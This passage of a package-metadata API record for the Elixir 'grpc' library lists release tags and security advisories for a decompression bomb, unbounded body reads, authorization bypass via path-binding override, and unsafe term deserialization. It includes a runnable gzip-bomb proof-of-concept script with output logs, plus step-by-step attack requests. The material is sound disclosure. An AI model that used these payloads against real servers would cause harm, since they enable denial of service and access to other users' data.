oad.github.com/elixir-grpc/grpc/tar.gz/v0.3.0-alpha.1","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.3.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.3.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.3.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.3.0-alpha.1/manifests"},{"name":"v0.2.1","sha":"5befbb2729907e085bab95ed7229fb213ca3e2c3","kind":"commit","published_at":"2017-08-20T15:31:38.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.2.1","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"44d84ded3c98f5a8d7e7e1beb757cf973d6d8224","kind":"commit","published_at":"2017-08-12T13:39:40.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.2.0","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.2.0/manifests"},{"name":"v0.1.0","sha":"ec4534bc1df6e1b93181b6ed3d9449494fee061c","kind":"commit","published_at":"2017-02-09T15:04:12.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.1.0","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.1.0/manifests"}]},"repo_metadata_updated_at":"2026-10-07T02:30:00.903Z","dependent_packages_count":47,"downloads":7162110,"downloads_period":"total","dependent_repos_count":84,"rankings":{"downloads":2.7307409142627668,"dependent_repos_count":1.7271388405409025,"dependent_packages_count":0.722843183187203,"stargazers_count":0.5957959566206988,"forks_count":1.144731557102691,"docker_downloads_count":null,"average":1.3842500903428525},"purl":"pkg:hex/grpc","advisories":[{"uuid":"GSA_kwCzR0hTQS02Y2N4LTljOWYtMzI3d84ABlWZ","url":"https://github.com/advisories/GHSA-6ccx-9c9f-327w","title":"gRPC Erlang package has unbounded gzip decompression (decompression bomb)","description":"### Summary\nAn unauthenticated remote peer can crash any gRPC server built on this library by sending a small gzip-compressed frame that decompresses to gigabytes, exhausting the BEAM node's heap and triggering an OOM kill (denial of service).\n\nIntroduced in https://github.com/elixir-grpc/grpc/commit/beae6800fc8baf126f3fe7107d86a50e105275ba\n\n### Details\n`GRPC.Compressor.Gzip.decompress/1` (lib/grpc/compressor/gzip.ex:12-14) calls `:zlib.gunzip/1` directly on attacker-controlled bytes with no size limit, no ratio check, and no incremental decoding. Because this module is registered as a `GRPC.Compressor` implementation, it is invoked automatically whenever an incoming gRPC frame carries `grpc-encoding: gzip`. `:zlib.gunzip/1` allocates the entire decompressed result as a single binary before returning, so a highly compressible payload (e.g. a few kilobytes of zeros, which gzip compresses at roughly 1000:1) expands to multiple gigabytes inside a single function call. The server's `max_receive_message_length` is enforced only against the already-decompressed message, so it provides no protection here. A single request is sufficient to OOM-kill the node.\n\n### PoC\nA script that verifies the vulnerability is attached to the end of this report. Run it against a stock gRPC server using this library; the BEAM node's memory usage will balloon and the VM will be OOM-killed after a single request.\n\n### Impact\nThis is a decompression bomb / denial-of-service vulnerability. Any service that exposes a gRPC endpoint built on this library and accepts gzip-compressed requests is affected. No authentication, prior state, or special configuration is required — the attacker only needs to be able to reach the gRPC port and send a single crafted frame with `grpc-encoding: gzip`.\n\n## Scripts and Logs\n\n```elixir\n# Verifies: Unbounded gzip decompression (decompression bomb)\n\nMix.install([{:grpc, \"~\u003e 0.9\"}])\n\n# Build a gzip bomb: 200 MB of zeros compresses to roughly a few hundred KB.\nuncompressed_size = 200 * 1024 * 1024\nbomb_payload = :zlib.gzip(:binary.copy(\u003c\u003c0\u003e\u003e, uncompressed_size))\n\n# Wrap the bomb in a gRPC length-prefixed frame with the \"compressed\" flag (1)\n# set. This is the exact wire shape an outside peer would put on the socket\n# for a `grpc-encoding: gzip` message.\nframe =\n  \u003c\u003c1, byte_size(bomb_payload)::unsigned-integer-32, bomb_payload::binary\u003e\u003e\n\nIO.puts(\n  \"Compressed bomb: #{byte_size(bomb_payload)} bytes -\u003e claims to expand to #{uncompressed_size} bytes\"\n)\n\n:erlang.garbage_collect()\nmem_before = :erlang.memory(:total)\nIO.puts(\"Memory before: #{div(mem_before, 1024 * 1024)} MB\")\n\n# Public entry point: GRPC.Message.from_data/2 is what the server's request\n# handling pipeline calls with the raw bytes pulled off an incoming HTTP/2\n# DATA frame, once it has resolved the encoding header to a compressor module.\n# An outside attacker controls `frame`; the library is the trust boundary.\n{:ok, decompressed} =\n  GRPC.Message.from_data(%{compressor: GRPC.Compressor.Gzip}, frame)\n\nmem_after = :erlang.memory(:total)\nIO.puts(\"Memory after:  #{div(mem_after, 1024 * 1024)} MB\")\nIO.puts(\"Delta:         #{div(mem_after - mem_before, 1024 * 1024)} MB\")\nIO.puts(\"Decompressed binary size: #{byte_size(decompressed)} bytes\")\n\namplification = byte_size(decompressed) / byte_size(bomb_payload)\nIO.puts(\"Amplification ratio: ~#{Float.round(amplification, 1)}x\")\n\nif byte_size(decompressed) == uncompressed_size do\n  IO.puts(\n    \"VERIFIED: GRPC.Message.from_data/2 fully expanded the gzip bomb with no size cap, growing heap by ~#{div(mem_after - mem_before, 1024 * 1024)} MB from a #{div(byte_size(bomb_payload), 1024)} KB attacker payload.\"\n  )\nelse\n  IO.puts(\"NOT VERIFIED: decompressed size did not match expected payload\")\nend\n```\n\n```logs\nCompressed bomb: 203860 bytes -\u003e claims to expand to 209715200 bytes\nMemory before: 45 MB\nMemory after:  403 MB\nDelta:         358 MB\nDecompressed binary size: 209715200 bytes\nAmplification ratio: ~1028.7x\nVERIFIED: GRPC.Message.from_data/2 fully expanded the gzip bomb with no size cap, growing heap by ~358 MB from a 199 KB attacker payload.\n```","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-08-25T18:12:58.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/elixir-grpc/grpc/security/advisories/GHSA-6ccx-9c9f-327w","https://nvd.nist.gov/vuln/detail/CVE-2026-53430","https://github.com/elixir-grpc/grpc/pull/543","https://github.com/elixir-grpc/grpc/commit/1afbab9d57d2a3e16ca9c62ffa4923338ea96cfc","https://cna.erlef.org/cves/CVE-2026-53430.html","https://github.com/elixir-grpc/grpc/releases/tag/v1.0.0","https://osv.dev/vulnerability/EEF-CVE-2026-53430","https://github.com/advisories/GHSA-6ccx-9c9f-327w"],"source_kind":"github","identifiers":["GHSA-6ccx-9c9f-327w","CVE-2026-53430"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-25T19:00:14.465Z","updated_at":"2026-10-07T16:01:00.527Z","epss_percentage":0.00524,"epss_percentile":0.42513,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02Y2N4LTljOWYtMzI3d84ABlWZ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02Y2N4LTljOWYtMzI3d84ABlWZ","packages":[{"ecosystem":"hex","package_name":"grpc","versions":[{"first_patched_version":"1.0.0","vulnerable_version_range":"\u003e= 0.4.0, \u003c 1.0.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02Y2N4LTljOWYtMzI3d84ABlWZ/related_packages","related_advisories":[{"uuid":"EEF-CVE-2026-53430","source_kind":"erlef","url":"https://github.com/elixir-grpc/grpc/security/advisories/GHSA-6ccx-9c9f-327w"}]},{"uuid":"GSA_kwCzR0hTQS1xOGdmLTlydmotZ21nas4ABlWY","url":"https://github.com/advisories/GHSA-q8gf-9rvj-gmgj","title":"gRPC Erlang package has unbounded request body accumulation in `read_full_body/3`","description":"### Summary\n\n`'Elixir.GRPC.Server.Adapters.Cowboy.Handler':read_full_body/3` accumulates every received chunk into a single growing binary with no size cap. When the client omits the `grpc-timeout` header, the read timeout resolves to `:infinity`, allowing a slow-trickle attacker to hold the connection open indefinitely while memory grows. A single unauthenticated connection is sufficient to exhaust BEAM memory and crash the node.\n\n### Details\n\nThe read loop in `lib/grpc/server/adapters/cowboy/handler.ex` calls `:cowboy_req.read_body/2` in a recursive loop, concatenating each chunk: `body \u003c\u003e data`. There is no running-total check and no configurable maximum body size. As the loop drains the receive buffer, cowboy issues fresh HTTP/2 `WINDOW_UPDATE` frames, so the client can keep pushing data indefinitely.\n\nThe `grpc-timeout` header is attacker-supplied and optional. When absent, `timeout_left_opt(nil)` returns `:infinity`, so the per-chunk read also has no deadline. The two missing controls compound: a fast client can blast multi-gigabyte payloads directly into memory; a slow client can trickle data forever.\n\n### PoC\n\n1. Start any `grpc` server exposing a unary RPC (no special configuration required).\n2. Open an HTTP/2 connection and send a POST to any unary RPC path with `Content-Type: application/grpc+proto` — omit the `grpc-timeout` header.\n3. Stream a large body (e.g. 1 GiB) in chunks without sending the final `END_STREAM` flag immediately.\n4. Observe BEAM memory growing proportionally to uploaded data with no server-side cap.\n\n### Impact\n\nAffects `grpc` ≥ 0.3.1. No authentication, no special configuration, and no specific RPC method required, the unbounded read is on the default unary ingress path.\n\n### References\n\n* Introduction commit: https://github.com/elixir-grpc/grpc/commit/d1abe70a6cad6dac4a3f8235d883d7c896989560\n* Patch commit: https://github.com/elixir-grpc/grpc/commit/49e18c3ec6bb9afe2f712caad3dbab5c56a68a00","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-08-25T18:12:05.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/elixir-grpc/grpc/security/advisories/GHSA-q8gf-9rvj-gmgj","https://nvd.nist.gov/vuln/detail/CVE-2026-48854","https://github.com/elixir-grpc/grpc/pull/542","https://github.com/elixir-grpc/grpc/commit/49e18c3ec6bb9afe2f712caad3dbab5c56a68a00","https://cna.erlef.org/cves/CVE-2026-48854.html","https://github.com/elixir-grpc/grpc/releases/tag/v1.0.0","https://osv.dev/vulnerability/EEF-CVE-2026-48854","https://github.com/advisories/GHSA-q8gf-9rvj-gmgj"],"source_kind":"github","identifiers":["GHSA-q8gf-9rvj-gmgj","CVE-2026-48854"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-25T19:00:14.465Z","updated_at":"2026-09-28T20:00:52.207Z","epss_percentage":0.00451,"epss_percentile":0.3652,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xOGdmLTlydmotZ21nas4ABlWY","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xOGdmLTlydmotZ21nas4ABlWY","packages":[{"ecosystem":"hex","package_name":"grpc","versions":[{"first_patched_version":"1.0.0","vulnerable_version_range":"\u003e= 0.3.1, \u003c 1.0.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xOGdmLTlydmotZ21nas4ABlWY/related_packages","related_advisories":[{"uuid":"EEF-CVE-2026-48854","source_kind":"erlef","url":"https://github.com/elixir-grpc/grpc/security/advisories/GHSA-q8gf-9rvj-gmgj"}]},{"uuid":"GSA_kwCzR0hTQS1td3I0LTVnMzQtajVjcc4ABlWX","url":"https://github.com/advisories/GHSA-mwr4-5g34-j5cq","title":"gRPC Erlang package's path bindings are overridable by query string and request body","description":"### Summary\n\nIn the HTTP-to-gRPC transcoding layer of the `grpc` Hex package, query-string and request-body parameters can silently overwrite path-bound fields when building the decoded protobuf request struct. An authenticated attacker who can reach a transcoded endpoint can substitute any path-bound identifier (e.g. `user_id` from `/users/{user_id}/profile`) with an arbitrary value, bypassing authorization, multi-tenancy, and ownership checks that rely on the path-derived field.\n\n### Details\n\nAll three clauses of `GRPC.Server.Transcode.map_request/5` (`grpc_server/lib/grpc/server/transcode.ex`) use `Map.merge/2` with path bindings as the first argument, giving them the lowest merge precedence. Path bindings are extracted by the router from the matched URL template and should be the authoritative resource identifiers, but query-string and body parameters overwrite them. The decoded protobuf struct handed to the handler carries the attacker's value instead of the router's.\n\n### PoC\n\n1. Deploy a transcoded gRPC service with a route like `GET /users/{user_id}/profile` where the handler authorizes access based on `request.user_id`.\n2. Send: `GET /users/me/profile?user_id=victim`\n3. The decoded request struct has `user_id = \"victim\"` — the authorization check passes for the victim's resource, not the caller's.\n4. Alternatively, for a `POST` with `body: \"*\"`: send `{\"user_id\": \"victim\"}` in the JSON body.\n\n### Impact\n\nAffects applications using `grpc` ≥ 0.8.0 with HTTP transcoding enabled that rely on path-bound fields for authorization or tenant isolation. Fixed in 1.0.0. An authenticated attacker can read or modify any other user's resources exposed via transcoded endpoints.\n\n### References\n\n* Introduction commit: https://github.com/elixir-grpc/grpc/commit/8aaf3d3a8c4c7b08ac65e9c6f254e0d24da1d048\n* Patch commit: https://github.com/elixir-grpc/grpc/commit/33b6a095dbc91c6dee3c7b90893d7d74952e82e4","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-08-25T18:11:15.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.6,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N","references":["https://github.com/elixir-grpc/grpc/security/advisories/GHSA-mwr4-5g34-j5cq","https://nvd.nist.gov/vuln/detail/CVE-2026-48599","https://github.com/elixir-grpc/grpc/pull/541","https://github.com/elixir-grpc/grpc/commit/33b6a095dbc91c6dee3c7b90893d7d74952e82e4","https://cna.erlef.org/cves/CVE-2026-48599.html","https://github.com/elixir-grpc/grpc/releases/tag/v1.0.0","https://osv.dev/vulnerability/EEF-CVE-2026-48599","https://github.com/advisories/GHSA-mwr4-5g34-j5cq"],"source_kind":"github","identifiers":["GHSA-mwr4-5g34-j5cq","CVE-2026-48599"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-25T19:00:14.465Z","updated_at":"2026-09-28T20:00:52.207Z","epss_percentage":0.00339,"epss_percentile":0.24685000000000001,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1td3I0LTVnMzQtajVjcc4ABlWX","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1td3I0LTVnMzQtajVjcc4ABlWX","packages":[{"ecosystem":"hex","package_name":"grpc","versions":[{"first_patched_version":"1.0.0","vulnerable_version_range":"\u003e= 0.8.0, \u003c 1.0.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1td3I0LTVnMzQtajVjcc4ABlWX/related_packages","related_advisories":[{"uuid":"EEF-CVE-2026-48599","source_kind":"erlef","url":"https://github.com/elixir-grpc/grpc/security/advisories/GHSA-mwr4-5g34-j5cq"}]},{"uuid":"GSA_kwCzR0hTQS1ncnA3LXY4eGgtcmo3aM4ABlWW","url":"https://github.com/advisories/GHSA-grp7-v8xh-rj7h","title":"gRPC Erlang package vulnerable to Remote Code Execution with attacker-controlled gRPC payloads","description":"### Summary\n\n`GRPC.Codec.Erlpack.decode/2` calls `:erlang.binary_to_term/1` directly on the raw gRPC message body without the `:safe` option. Any unauthenticated peer that can reach a gRPC endpoint with `Content-Type: application/grpc+erlpack` can crash the entire BEAM node via atom table exhaustion or, if a decoded fun term flows into a call site that invokes it, achieve remote code execution inside the server process.\n\n### Details\n\n**Root cause** — `lib/grpc/codec/erlpack.ex` implements `decode/2` as a bare `:erlang.binary_to_term(binary)` call with no `:safe` flag, no size limit, and no type validation. This has two independent exploitation paths:\n\n**1. DoS via atom exhaustion** — BEAM atoms are never garbage-collected and the global atom table is bounded (~1,048,576 entries). A crafted payload encoding large numbers of fresh atoms saturates the table and crashes the entire VM, taking down all applications on the node.\n\n**2. RCE via fun materialization** — Without `:safe`, `binary_to_term/1` reconstructs fun and external-fun terms from wire data. If the decoded value reaches any call site that applies it (e.g. `Enum.map`, `Task.async`, direct invocation), attacker-controlled code executes inside the server process.\n\n**Configuration requirement:** `GRPC.Codec.Erlpack` is not registered by default and must be explicitly added to the server's `codecs` option.\n\n### PoC\n\n1. Start a gRPC server with `codecs: [GRPC.Codec.Erlpack]`.\n2. Open an HTTP/2 connection to the server.\n3. Send a gRPC-framed POST to any RPC path with `Content-Type: application/grpc+erlpack` and a body of `:erlang.term_to_binary(fn -\u003e \u003cmalicious_code\u003e end)`.\n4. The server's `decode/2` materializes the fun; any downstream call site that invokes the decoded value executes the attacker's code.\n5. For DoS only: send payloads encoding fresh atoms in a loop until the atom table is exhausted and the VM crashes.\n\n### Impact\n\nAffects `grpc` ≥ 0.4.0. Any server that explicitly registers `GRPC.Codec.Erlpack` is vulnerable to unauthenticated node-level DoS and potentially RCE.\n\n### References\n\n* Introduction commit: https://github.com/elixir-grpc/grpc/commit/25bcc569fe2cc4478531a6c546c923205fc751c9\n* Patch commit: https://github.com/elixir-grpc/grpc/commit/272a97a5ea1b46af1819f14a831fcf35fc91f992","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-08-25T18:09:53.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.2,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/elixir-grpc/grpc/security/advisories/GHSA-grp7-v8xh-rj7h","https://nvd.nist.gov/vuln/detail/CVE-2026-48853","https://github.com/elixir-grpc/grpc/pull/540","https://github.com/elixir-grpc/grpc/commit/272a97a5ea1b46af1819f14a831fcf35fc91f992","https://cna.erlef.org/cves/CVE-2026-48853.html","https://github.com/elixir-grpc/grpc/releases/tag/v1.0.0","https://osv.dev/vulnerability/EEF-CVE-2026-48853","https://github.com/advisories/GHSA-grp7-v8xh-rj7h"],"source_kind":"github","identifiers":["GHSA-grp7-v8xh-rj7h","CVE-2026-48853"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-25T19:00:14.465Z","updated_at":"2026-10-05T15:01:00.749Z","epss_percentage":0.00784,"epss_percentile":0.54524,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ncnA3LXY4eGgtcmo3aM4ABlWW","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ncnA3LXY4eGgtcmo3aM4ABlWW","packages":[{"ecosystem":"hex","package_name":"grpc","versions":[{"first_patched_version":"1.0.0","vulnerable_version_range":"\u003e= 0.4.0, \u003c 1.0.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ncnA3LXY4eGgtcmo3aM4ABlWW/related_packages","related_advisories":[{"uuid":"EEF-CVE-2026-48853","source_kind":"erlef","url":"https://github.com/elixir-grpc/grpc/security/advisories/GHSA-grp7-v8xh-rj7h"}]},{"uuid":"EEF-CVE-2026-48853","url":"https://github.com/elixir-grpc/grpc/security/advisories/GHSA-grp7-v8xh-rj7h","title":"Remote code execution and denial of service via unsafe Erlang term deserialization in elixir-grpc/grpc","description":"## Summary\n\nDeserialization of Untrusted Data and Allocation of Resources Without Limits or Throttling vulnerabilities in elixir-grpc grpc allow unauthenticated attackers to crash the BEAM node via atom table exhaustion and, when a decoded term flows into a call site that invokes it, achieve remote code execution on the server.\n\n`'Elixir.GRPC.Codec.Erlpack':decode/2` (`lib/grpc/codec/erlpack.ex`) calls `:erlang.binary_to_term/1` on the raw gRPC message body without the `:safe` option, no size bound, and no type guard. Any unauthenticated peer that sends a request with `Content-Type: application/grpc+erlpack` can send a crafted payload that mints arbitrary new atoms (which are never garbage-collected, exhausting the bounded atom table and crashing the VM) or that encodes a fun term which, if applied anywhere downstream, executes attacker-controlled code inside the server process.\n\nThis issue affects grpc: from 0.4.0 before 1.0.0.\n\n## Configurations\n\n`GRPC.Codec.Erlpack` must be explicitly registered as a codec on the gRPC server.","origin":"ERLEF","severity":"CRITICAL","published_at":"2026-06-15T21:56:15.262Z","withdrawn_at":null,"classification":null,"cvss_score":9.2,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/elixir-grpc/grpc/security/advisories/GHSA-grp7-v8xh-rj7h","https://cna.erlef.org/cves/CVE-2026-48853.html","https://github.com/elixir-grpc/grpc/commit/25bcc569fe2cc4478531a6c546c923205fc751c9","https://github.com/elixir-grpc/grpc/commit/272a97a5ea1b46af1819f14a831fcf35fc91f992","https://hex.pm/packages/grpc"],"source_kind":"erlef","identifiers":["EEF-CVE-2026-48853","GHSA-grp7-v8xh-rj7h","CVE-2026-48853"],"repository_url":"https://github.com/elixir-grpc/grpc","blast_radius":17.70336943176931,"created_at":"2026-06-15T22:18:57.460Z","updated_at":"2026-09-24T21:08:47.792Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/EEF-CVE-2026-48853","html_url":"https://advisories.ecosyste.ms/advisories/EEF-CVE-2026-48853","packages":[{"ecosystem":"hex","package_name":"grpc","versions":[{"first_patched_version":"1.0.0","vulnerable_version_range":"\u003e= 0.4.0, \u003c 1.0.0"}],"purl":null,"statistics":{"dependent_packages_count":47,"dependent_repos_count":84,"downloads":7145362,"downloads_period":"total"},"affected_versions":["0.5.0","0.5.0-beta","0.5.0-beta.1","0.6.0","0.7.0","0.8.0","0.8.1","0.9.0","0.10.0","0.10.1","0.10.2","0.11.0","0.11.1","0.11.2","0.11.3","0.11.4","0.11.5","1.0.0-rc.1"],"unaffected_versions":["0.3.1","1.0.0","1.0.1","1.0.2","1.0.3","1.0.4","1.0.5"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/EEF-CVE-2026-48853/related_packages","related_advisories":[{"uuid":"GSA_kwCzR0hTQS1ncnA3LXY4eGgtcmo3aM4ABlWW","source_kind":"github","url":"https://github.com/advisories/GHSA-grp7-v8xh-rj7h"}]},{"uuid":"EEF-CVE-2026-53430","url":"https://github.com/elixir-grpc/grpc/security/advisories/GHSA-6ccx-9c9f-327w","title":"grpc gzip decompression bomb in GRPC.Compressor.Gzip.decompress/1","description":"## Summary\n\nImproper Handling of Highly Compressed Data (Data Amplification) vulnerability in elixir-grpc grpc (GRPC.Compressor.Gzip, GRPC.Message modules) allows a denial of service via a gzip decompression bomb.\n\nThis vulnerability is associated with program files lib/grpc/compressor/gzip.ex, lib/grpc/message.ex and program routines 'Elixir.GRPC.Compressor.Gzip':decompress/1, 'Elixir.GRPC.Message':from\\_data/2.\n\n'Elixir.GRPC.Compressor.Gzip':decompress/1 calls :zlib.gunzip/1 directly on attacker-controlled bytes with no decompressed-size limit, ratio check, or incremental decoding. Because this module is the registered gzip GRPC.Compressor implementation, it is invoked automatically whenever an incoming gRPC frame carries the grpc-encoding: gzip header. :zlib.gunzip/1 allocates the entire decompressed result as a single binary, so a small highly compressible payload (for example a few kilobytes of zeros, which gzip compresses at roughly 1000:1) expands to multiple gigabytes inside a single call. The max\\_receive\\_message\\_length limit is enforced only against the already-decompressed message, so it provides no protection. An unauthenticated remote peer can send a single crafted frame to exhaust the BEAM node's heap and trigger an out-of-memory kill.\n\nThis issue affects grpc: from 0.4.0 before 1.0.0.","origin":"ERLEF","severity":"HIGH","published_at":"2026-06-15T21:55:33.707Z","withdrawn_at":null,"classification":null,"cvss_score":8.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/elixir-grpc/grpc/security/advisories/GHSA-6ccx-9c9f-327w","https://cna.erlef.org/cves/CVE-2026-53430.html","https://github.com/elixir-grpc/grpc/commit/1afbab9d57d2a3e16ca9c62ffa4923338ea96cfc","https://hex.pm/packages/grpc"],"source_kind":"erlef","identifiers":["EEF-CVE-2026-53430","GHSA-6ccx-9c9f-327w","CVE-2026-53430"],"repository_url":"https://github.com/elixir-grpc/grpc","blast_radius":16.74122978873837,"created_at":"2026-06-15T22:18:57.909Z","updated_at":"2026-07-30T18:22:08.595Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/EEF-CVE-2026-53430","html_url":"https://advisories.ecosyste.ms/advisories/EEF-CVE-2026-53430","packages":[{"ecosystem":"hex","package_name":"grpc","versions":[{"first_patched_version":"1.0.0","vulnerable_version_range":"\u003e= 0.4.0, \u003c 1.0.0"}],"purl":null,"statistics":{"dependent_packages_count":47,"dependent_repos_count":84,"downloads":7145362,"downloads_period":"total"},"affected_versions":["0.5.0","0.5.0-beta","0.5.0-beta.1","0.6.0","0.7.0","0.8.0","0.8.1","0.9.0","0.10.0","0.10.1","0.10.2","0.11.0","0.11.1","0.11.2","0.11.3","0.11.4","0.11.5","1.0.0-rc.1"],"unaffected_versions":["0.3.1","1.0.0","1.0.1","1.0.2","1.0.3","1.0.4","1.0.5"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/EEF-CVE-2026-53430/related_packages","related_advisories":[{"uuid":"GSA_kwCzR0hTQS02Y2N4LTljOWYtMzI3d84ABlWZ","source_kind":"github","url":"https://github.com/advisories/GHSA-6ccx-9c9f-327w"}]},{"uuid":"EEF-CVE-2026-48599","url":"https://github.com/elixir-grpc/grpc/security/advisories/GHSA-mwr4-5g34-j5cq","title":"Authorization bypass via path binding override in elixir-grpc/grpc HTTP transcoding","description":"## Summary\n\nAuthorization Bypass Through User-Controlled Key vulnerability in elixir-grpc grpc allows authenticated attackers to access or modify resources belonging to other users by smuggling a conflicting value for any path-bound field via the query string or request body.\n\nIn `'Elixir.GRPC.Server.Transcode':map_request/5` (`lib/grpc/server/transcode.ex`), all three clauses use `Map.merge/2` with path bindings as the first argument, giving them the lowest merge precedence. A request such as `GET /users/me/profile?user_id=victim` (or a POST with `{\"user_id\": \"victim\"}` when `body: \"*\"`) yields a decoded protobuf struct where the path-bound field carries the attacker-supplied value rather than the router-extracted value. Any handler that uses the path-bound field for authorization, multi-tenancy scoping, or ownership checks is silently bypassed.\n\nThis issue affects grpc: from 0.8.0 before 1.0.0.\n\n## Configurations\n\nHTTP-to-gRPC transcoding must be enabled.","origin":"ERLEF","severity":"HIGH","published_at":"2026-06-15T21:55:28.702Z","withdrawn_at":null,"classification":null,"cvss_score":7.6,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N","references":["https://github.com/elixir-grpc/grpc/security/advisories/GHSA-mwr4-5g34-j5cq","https://cna.erlef.org/cves/CVE-2026-48599.html","https://github.com/elixir-grpc/grpc/commit/8aaf3d3a8c4c7b08ac65e9c6f254e0d24da1d048","https://github.com/elixir-grpc/grpc/commit/33b6a095dbc91c6dee3c7b90893d7d74952e82e4","https://hex.pm/packages/grpc"],"source_kind":"erlef","identifiers":["EEF-CVE-2026-48599","GHSA-mwr4-5g34-j5cq","CVE-2026-48599"],"repository_url":"https://github.com/elixir-grpc/grpc","blast_radius":14.6245225740703,"created_at":"2026-06-15T22:18:57.377Z","updated_at":"2026-09-24T21:04:09.272Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/EEF-CVE-2026-48599","html_url":"https://advisories.ecosyste.ms/advisories/EEF-CVE-2026-48599","packages":[{"ecosystem":"hex","package_name":"grpc","versions":[{"first_patched_version":"1.0.0","vulnerable_version_range":"\u003e= 0.8.0, \u003c 1.0.0"}],"purl":null,"statistics":{"dependent_packages_count":47,"dependent_repos_count":84,"downloads":7145362,"downloads_period":"total"},"affected_versions":["0.8.0","0.8.1","0.9.0","0.10.0","0.10.1","0.10.2","0.11.0","0.11.1","0.11.2","0.11.3","0.11.4","0.11.5","1.0.0-rc.1"],"unaffected_versions":["0.3.1","0.5.0","0.6.0","0.7.0","1.0.0","1.0.1","1.0.2","1.0.3","1.0.4","1.0.5"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/EEF-CVE-2026-48599/related_packages","related_advisories":[{"uuid":"GSA_kwCzR0hTQS1td3I0LTVnMzQtajVjcc4ABlWX","source_kind":"github","url":"https://github.com/advisories/GHSA-mwr4-5g34-j5cq"}]},{"uuid":"EEF-CVE-2026-48854","url":"https://github.com/elixir-grpc/grpc/security/advisories/GHSA-q8gf-9rvj-gmgj","title":"Unbounded request 